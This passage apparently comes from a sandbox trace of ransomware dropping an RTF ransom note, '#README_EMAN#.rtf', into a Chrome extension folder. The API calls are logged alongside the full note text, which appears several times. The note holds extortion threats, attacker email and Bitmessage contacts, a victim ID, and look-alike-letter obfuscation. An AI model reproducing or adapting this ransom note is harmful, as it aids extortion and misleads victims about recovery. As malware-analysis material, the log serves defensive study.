vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.208] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.209] CloseHandle (hObject=0x2ec) returned 1 [0291.209] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0291.209] GetLastError () returned 0x2 [0291.209] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.210] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 